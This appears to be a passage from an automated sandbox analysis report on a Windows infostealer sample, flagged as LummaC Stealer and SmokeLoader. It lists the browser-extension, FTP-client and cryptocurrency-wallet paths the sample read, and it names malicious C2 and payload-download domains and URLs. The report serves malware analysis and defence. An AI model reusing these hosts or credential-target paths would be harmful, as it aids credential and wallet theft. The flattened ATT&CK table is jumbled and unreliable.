                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                  Source: Yara matchFile source: 0000000D.00000003.2677007579.000000000281E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000003.2675938074.0000000002851000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000003.2642232685.0000000002808000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000003.2642232685.0000000002843000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000003.2676158803.0000000002808000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7784, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Go Injector
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 8.0.60FC.exe.7ff7e7250000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.60FC.exe.7ff7e7250000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.2599552329.00007FF7E7790000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000000.2458376927.00007FF7E7790000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 60FC.exe PID: 5300, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\60FC.exe, type: DROPPED
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7784, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Yara detected SmokeLoader
                  Source: Yara matchFile source: 00000005.00000002.2008625039.0000000002510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1766138054.00000000041B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2008687958.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1765878956.00000000026F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts331
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		11
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution                  		11
                  Registry Run Keys / Startup Folder                  		1
                  Access Token Manipulation                  		11
                  Deobfuscate/Decode Files or Information                  		LSASS Memory234
                  System Information Discovery                  		Remote Desktop Protocol41
                  Data from Local System                  		13
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  Command and Scripting Interpreter                  		Logon Script (Windows)812
                  Process Injection                  		4
                  Obfuscated Files or Information                  		Security Account Manager951
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Screen Capture                  		21
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts4
                  PowerShell                  		Login Hook11
                  Registry Run Keys / Startup Folder                  		12
                  Software Packing                  		NTDS471
                  Virtualization/Sandbox Evasion                  		Distributed Component Object Model2
                  Clipboard Data                  		4
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets3
                  Process Discovery                  		SSHKeylogging125
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  File Deletion                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Masquerading                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job471
                  Virtualization/Sandbox Evasion                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Access Token Manipulation                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron812
                  Process Injection                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Hidden Files and Directories                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483443 Sample: file.exe Startdate: 27/07/2024 Architecture: WINDOWS Score: 100 64 rentry.co 2->64 66 mzxn.ru 2->66 68 4 other IPs or domains 2->68 102 Multi AV Scanner detection for domain / URL 2->102 104 Found malware configuration 2->104 106 Malicious sample detected (through community Yara rule) 2->106 110 16 other signatures 2->110 10 file.exe 2->10         started        13 sbttifb 2->13         started        signatures3 108 Connects to a pastebin service (likely for C&C) 64->108 process4 signatures5 136 Detected unpacking (changes PE section rights) 10->136 138 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 10->138 140 Maps a DLL or memory area into another process 10->140 148 3 other signatures 10->148 15 explorer.exe 83 10 10->15 injected 142 Antivirus detection for dropped file 13->142 144 Multi AV Scanner detection for dropped file 13->144 146 Machine Learning detection for dropped file 13->146 process6 dnsIp7 72 mussangroup.com 185.149.100.242, 443, 49755 VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi Turkey 15->72 74 mzxn.ru 187.199.183.102, 49736, 49737, 49738 UninetSAdeCVMX Mexico 15->74 76 7 other IPs or domains 15->76 48 C:\Users\user\AppData\Roaming\sbttifb, PE32 15->48 dropped 50 C:\Users\user\AppData\Local\Temp\6BC6.exe, PE32+ 15->50 dropped 52 C:\Users\user\AppData\Local\Temp\6267.exe, PE32+ 15->52 dropped 54 2 other malicious files 15->54 dropped 82 System process connects to network (likely due to code injection or exploit) 15->82 84 Benign windows process drops PE files 15->84 86 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 15->86 88 5 other signatures 15->88 20 6BC6.exe 14 6 15->20         started        25 60FC.exe 2 15->25         started        27 6267.exe 1 15->27         started        29 2 other processes 15->29 file8 signatures9 process10 dnsIp11 70 rentry.co 104.26.3.16, 443, 49774 CLOUDFLARENETUS United States 20->70 62 C:\Users\user\AppData\...\rentry-script.ps1, ASCII 20->62 dropped 112 Suspicious powershell command line found 20->112 114 Found many strings related to Crypto-Wallets (likely being stolen) 20->114 116 Bypasses PowerShell execution policy 20->116 132 3 other signatures 20->132 31 powershell.exe 20->31         started        36 6BC6.exe 20->36         started        118 Multi AV Scanner detection for dropped file 25->118 120 Writes to foreign memory regions 25->120 122 Allocates memory in foreign processes 25->122 134 2 other signatures 25->134 38 BitLockerToGo.exe 25->38         started        124 Check for Windows Defender sandbox 27->124 126 Machine Learning detection for dropped file 27->126 128 Changes memory attributes in foreign processes to executable or writable 27->128 130 Injects code into the Windows Explorer (explorer.exe) 27->130 40 conhost.exe 27->40         started        42 conhost.exe 29->42         started        44 conhost.exe 29->44         started        file12 signatures13 process14 dnsIp15 78 store4.gofile.io 31.14.70.245, 443, 49780, 49782 LINKER-ASFR Virgin Islands (BRITISH) 31->78 56 C:\Users\user\AppData\Local\Temp\...\lm.exe, PE32 31->56 dropped 58 C:\Users\user\AppData\Local\Temp\...\g2m.dll, PE32 31->58 dropped 60 C:\Users\user\AppData\Local\Temp\...\run.bat, DOS 31->60 dropped 90 Loading BitLocker PowerShell Module 31->90 92 Powershell drops PE file 31->92 46 conhost.exe 31->46         started        80 callosallsaospz.shop 188.114.97.3, 443, 49777, 49778 CLOUDFLARENETUS European Union 38->80 94 Query firmware table information (likely to detect VMs) 38->94 96 Found many strings related to Crypto-Wallets (likely being stolen) 38->96 98 Tries to harvest and steal ftp login credentials 38->98 100 2 other signatures 38->100 file16 signatures17 process18

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  file.exe37%ReversingLabsWin32.Trojan.Generic
                  file.exe43%VirustotalBrowse
                  file.exe100%AviraHEUR/AGEN.1312596
                  file.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\sbttifb100%AviraHEUR/AGEN.1312596
                  C:\Users\user\AppData\Local\Temp\6267.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\sbttifb100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\60FC.exe50%ReversingLabsWin32.Trojan.Generic
                  C:\Users\user\AppData\Local\Temp\60FC.exe71%VirustotalBrowse
                  C:\Users\user\AppData\Local\Temp\6267.exe71%ReversingLabsWin32.Trojan.Generic
                  C:\Users\user\AppData\Local\Temp\6267.exe72%VirustotalBrowse
                  C:\Users\user\AppData\Local\Temp\6BC6.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\6BC6.exe0%VirustotalBrowse
                  C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll42%ReversingLabsWin32.Adware.RedCap
                  C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe0%ReversingLabs
                  C:\Users\user\AppData\Roaming\sbttifb37%ReversingLabsWin32.Trojan.Generic

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  funrecipebooks.com1%VirustotalBrowse
                  store4.gofile.io0%VirustotalBrowse
                  rentry.co1%VirustotalBrowse
                  mzxn.ru2%VirustotalBrowse
                  callosallsaospz.shop19%VirustotalBrowse
                  mussangroup.com14%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  https://aka.ms/odirmr0%URL Reputationsafe
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
                  https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
                  http://ocsps.ssl.com0?0%URL Reputationsafe
                  http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt00%URL Reputationsafe
                  https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%URL Reputationsafe
                  http://www.fontbureau.com/designers0%URL Reputationsafe
                  https://excel.office.com0%URL Reputationsafe
                  https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we0%URL Reputationsafe
                  https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%URL Reputationsafe
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc940%URL Reputationsafe
                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
                  https://wns.windows.com/L0%URL Reputationsafe
                  https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
                  https://word.office.com0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                  http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win0%URL Reputationsafe
                  http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-0%URL Reputationsafe
                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
                  http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%URL Reputationsafe
                  https://www.rd.com/list/polite-habits-campers-dislike/0%URL Reputationsafe
                  https://android.notify.windows.com/iOS0%URL Reputationsafe
                  https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                  https://outlook.com_0%URL Reputationsafe
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
                  https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%URL Reputationsafe
                  http://100xmargin.com/tmp/index.php0%Avira URL Cloudsafe
                  http://olinsw.ws/tmp/index.php0%Avira URL Cloudsafe
                  https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at0%URL Reputationsafe
                  http://www.fontbureau.com/designersG0%URL Reputationsafe
                  http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl00%Avira URL Cloudsafe
                  http://www.fontbureau.com/designers/?0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.fontbureau.com/designers?0%URL Reputationsafe
                  https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl0%URL Reputationsafe
                  https://powerpoint.office.comcember0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q0%URL Reputationsafe
                  http://ocsps.ssl.com00%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-0%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://olinsw.ws/tmp/index.php0%VirustotalBrowse
                  http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl00%VirustotalBrowse
                  http://mzxn.ru/tmp/index.php0%Avira URL Cloudsafe
                  https://callosallsaospz.shop/lbf100%Avira URL Cloudmalware
                  https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                  https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip0%VirustotalBrowse
                  https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip0%Avira URL Cloudsafe
                  callosallsaospz.shop100%Avira URL Cloudmalware
                  http://100xmargin.com/tmp/index.php0%VirustotalBrowse
                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
                  https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                  http://ocsps.ssl.com0_0%Avira URL Cloudsafe
                  http://mzxn.ru/tmp/index.php2%VirustotalBrowse
                  liernessfornicsa.shop0%Avira URL Cloudsafe
                  https://rentry.co0%Avira URL Cloudsafe
                  http://www.oberhumer.com0%Avira URL Cloudsafe
                  http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
                  https://store4.gofile.io0%Avira URL Cloudsafe
                  http://www.oberhumer.com0%VirustotalBrowse
                  callosallsaospz.shop19%VirustotalBrowse
                  https://107.173.160.139/0%Avira URL Cloudsafe
                  liernessfornicsa.shop19%VirustotalBrowse
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                  shepherdlyopzc.shop0%Avira URL Cloudsafe
                  http://www.autoitscript.com/autoit3/J0%VirustotalBrowse
                  https://rentry.co1%VirustotalBrowse
                  https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%Avira URL Cloudsafe
                  http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer00%Avira URL Cloudsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                  http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
                  https://107.173.160.139/3%VirustotalBrowse
                  shepherdlyopzc.shop19%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  funrecipebooks.com
                  		162.0.235.84
                  		truetrueunknown
                  store4.gofile.io
                  		31.14.70.245
                  		truefalseunknown
                  rentry.co
                  		104.26.3.16
                  		truetrueunknown
                  mzxn.ru
                  		187.199.183.102
                  		truetrueunknown
                  mussangroup.com
                  		185.149.100.242
                  		truetrueunknown
                  callosallsaospz.shop
                  		188.114.97.3
                  		truetrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://100xmargin.com/tmp/index.phptrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://olinsw.ws/tmp/index.phptrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://mzxn.ru/tmp/index.phptrue
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zipfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  callosallsaospz.shoptrue
                  • 19%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  liernessfornicsa.shoptrue
                  • 19%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://107.173.160.139/true
                  • 3%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  shepherdlyopzc.shoptrue
                  • 19%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  upknittsoappz.shoptrue
                  • 19%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://mussangroup.com/wp-content/images/pic1.jpgtrue
                  • 6%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zipfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  unseaffarignsk.shoptrue
                  • 22%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://callosallsaospz.shop/apitrue
                  • 22%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  http://wgdnb4rc.xyz/tmp/index.phptrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://107.173.160.137/true
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://rentry.co/microgods/rawfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  lariatedzugspd.shoptrue
                  • 19%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1752824604.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 0000000D.00000003.2604464536.0000000004B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 0000000D.00000003.2604464536.0000000004B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
